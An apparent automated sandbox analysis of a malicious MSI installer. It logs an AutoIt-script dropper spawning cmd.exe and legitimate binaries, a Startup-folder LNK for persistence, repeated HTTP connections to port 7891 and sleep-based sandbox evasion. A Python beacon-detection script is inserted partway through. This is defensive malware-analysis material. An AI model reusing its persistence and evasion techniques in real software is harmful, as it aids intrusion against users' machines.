            Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 4108, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: cmd.exe PID: 4696, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 7204, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: SciTE.exe PID: 7396, type: MEMORYSTR
            Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIDAD.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5f09c5.msi
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004222B4
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0045652C
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00456778
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 00404500 appears 50 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 00404554 appears 55 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 004049DC appears 65 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 00406B98 appears 77 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 00446258 appears 33 times
            Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 00455C58 appears 539 times
            Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
            Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
            Source: C:\Windows\SysWOW64\expand.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
            Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
            Source: unknown Process created: C:\ProgramData\fkeabad\Autoit3.exe "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
            Source: C:\ProgramData\fkeabad\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
            Source: C:\ProgramData\fkeabad\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Process created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Process created: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
            Source: aafaecg.lnk.9.dr LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\fkeabad\Autoit3.exe
            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DFB7831024D2CFB248.TMP
            Source: classification engine Classification label: mal64.troj.evad.winMSI@51/27@0/1
            Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00450548 GetDiskFreeSpaceExA
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\fkeabad\Autoit3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00432F64 CreateToolhelp32Snapshot
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
            Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: 15e7232gfN.msi Static file information: File size 1921024 > 1048576
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0042806C push 00428098h; ret 9_2_00428090
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004460F8 push 0044613Ah; ret 9_2_00446132
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043E098 push 0043E0C4h; ret 9_2_0043E0BC
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0044C0B4 push 0044C10Bh; ret 9_2_0044C103
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0042C164 push 0042C272h; ret 9_2_0042C26A
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004201D0 push 004201FCh; ret 9_2_004201F4
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0041E1F8 push 0041E21Eh; ret 9_2_0041E216
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0042A27C push 0042A2EBh; ret 9_2_0042A2E3
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0042A208 push 0042A279h; ret 9_2_0042A271
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0041E2C4 push 0041E2EAh; ret 9_2_0041E2E2
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A2B0 push 0043A2DCh; ret 9_2_0043A2D4
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00444340 push 0044438Ch; ret 9_2_00444384
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A350 push 0043A37Ch; ret 9_2_0043A374
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A318 push 0043A344h; ret 9_2_0043A33C
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A3C0 push 0043A3ECh; ret 9_2_0043A3E4
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004443E4 push 00444410h; ret 9_2_00444408
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A3F8 push 0043A424h; ret 9_2_0043A41C
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A388 push 0043A3B4h; ret 9_2_0043A3AC
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00444398 push 004443DAh; ret 9_2_004443D2
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0045A410 push 0045A4B6h; ret 9_2_0045A4AE
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A4AC push 0043A4D8h; ret 9_2_0043A4D0
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004504BC push 00450509h; ret 9_2_00450501
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00458510 push 0045855Ch; ret 9_2_00458554
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0045E5CC push 0045E5F8h; ret 9_2_0045E5F0
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0045E594 push 0045E5C0h; ret 9_2_0045E5B8
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0041C640 push ecx; mov dword ptr [esp], edx 9_2_0041C642
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00440680 push 004406ACh; ret 9_2_004406A4
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00406764 push 004067B5h; ret 9_2_004067AD
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00418708 push ecx; mov dword ptr [esp], ecx 9_2_0041870D
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_004588A4 push 004588D0h; ret 9_2_004588C8
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0043A8A4 push 0043A8D0h; ret 9_2_0043A8C8
            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\ProgramData\fkeabad\Autoit3.exe
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe File created: C:\temp\AutoIt3.exe
            Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDAD.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3433.tmp
            Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)
            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

            Hooking and other Techniques for Hiding and Protection

            Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49690
            Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49692
            Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49696
            Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49697
            Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49702
            Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49703
            Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49707
            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49715
            Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49717
            Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49721
            Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49722
            Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49726
            Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49727
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49745
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49748
            Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49749
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49756
            Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49759
            Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49763
            Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49767
            Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 7891
            Source: unknown | Network traffic detected: HTTP traffic on port 7891 -> 49770
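The 54 flow lines above carry only port numbers, no addresses: every session is an ephemeral client port (49690 and upward) talking to the same service port, 7891, and the report labels the payload HTTP. That is the shape of 27 successive HTTP requests to one server, not of a sweep across ports, and the two patterns deserve different triage. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in this format, collapses each request/reply pair into one session, picks the service side by the Windows dynamic-port boundary (49152, an assumption that matches the default range on Vista and later), and separates "many sessions to one non-standard port" from "many distinct service ports". The HTTP port allow-list and the thresholds are assumptions, and the sample lines are constructed from the ports listed above.

```python
import re
from collections import defaultdict

# Only the port pair is parsed, so the line prefix ("Source: unknown ...") is irrelevant.
FLOW_RE = re.compile(r"traffic on port (\d+) -> (\d+)")
EPHEMERAL_START = 49152                                             # Windows dynamic (client) port range
STANDARD_HTTP_PORTS = frozenset({80, 443, 8000, 8080, 8443, 8888})  # assumed allow-list

# Constructed sample: eight of the sessions listed above, both directions each,
# in the report's own wording.
CLIENT_PORTS = [49690, 49692, 49696, 49697, 49702, 49703, 49707, 49708]
SAMPLE = "\n".join(
    f"Source: unknown Network traffic detected: HTTP traffic on port {p} -> 7891\n"
    f"Source: unknown Network traffic detected: HTTP traffic on port 7891 -> {p}"
    for p in CLIENT_PORTS
)

def parse_flows(text):
    """Return (src_port, dst_port) tuples, one per 'traffic on port A -> B' line."""
    return [(int(a), int(b)) for a, b in FLOW_RE.findall(text)]

def service_port(src, dst):
    """Pick the service side of a flow: the port outside the dynamic range,
    or the lower port if neither (or both) looks ephemeral."""
    src_eph, dst_eph = src >= EPHEMERAL_START, dst >= EPHEMERAL_START
    if src_eph and not dst_eph:
        return dst
    if dst_eph and not src_eph:
        return src
    return min(src, dst)

def sessions_by_service(flows):
    """Map service port -> sorted distinct client ports. The request and the
    reply of one TCP session collapse onto the same (service, client) pair."""
    sessions = defaultdict(set)
    for src, dst in flows:
        svc = service_port(src, dst)
        sessions[svc].add(dst if svc == src else src)
    return {svc: sorted(clients) for svc, clients in sessions.items()}

def assess(text, min_sessions=5, scan_threshold=10):
    """Distinguish repeated sessions to one service port (beacon-like) from
    contact with many distinct service ports (scan-like). Thresholds are assumed."""
    sessions = sessions_by_service(parse_flows(text))
    if len(sessions) >= scan_threshold:
        return {"sessions": sessions,
                "findings": [f"{len(sessions)} distinct service ports contacted: scan-like"]}
    findings = []
    for svc, clients in sorted(sessions.items()):
        if len(clients) >= min_sessions:
            findings.append(f"{len(clients)} sessions to port {svc}: repeated connections, beacon-like")
        if svc not in STANDARD_HTTP_PORTS:
            findings.append(f"HTTP carried on non-standard port {svc}")
    return {"sessions": sessions, "findings": findings}

if __name__ == "__main__":
    for finding in assess(SAMPLE)["findings"]:
        print(finding)
```

Run on the full list above it reports 27 sessions to port 7891; the per-session count is the number a hunt query should key on, because a beacon that reconnects for every request looks, at the flow level, like many connections to one port rather than like one long-lived connection.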
            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
            Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\fkeabad\Autoit3.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)

            Malware Analysis System Evasion

            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -42141s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -119333s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -38013s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -47979s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -58022s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -33161s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -44923s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -40647s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264 | Thread sleep time: -117784s >= -30000s
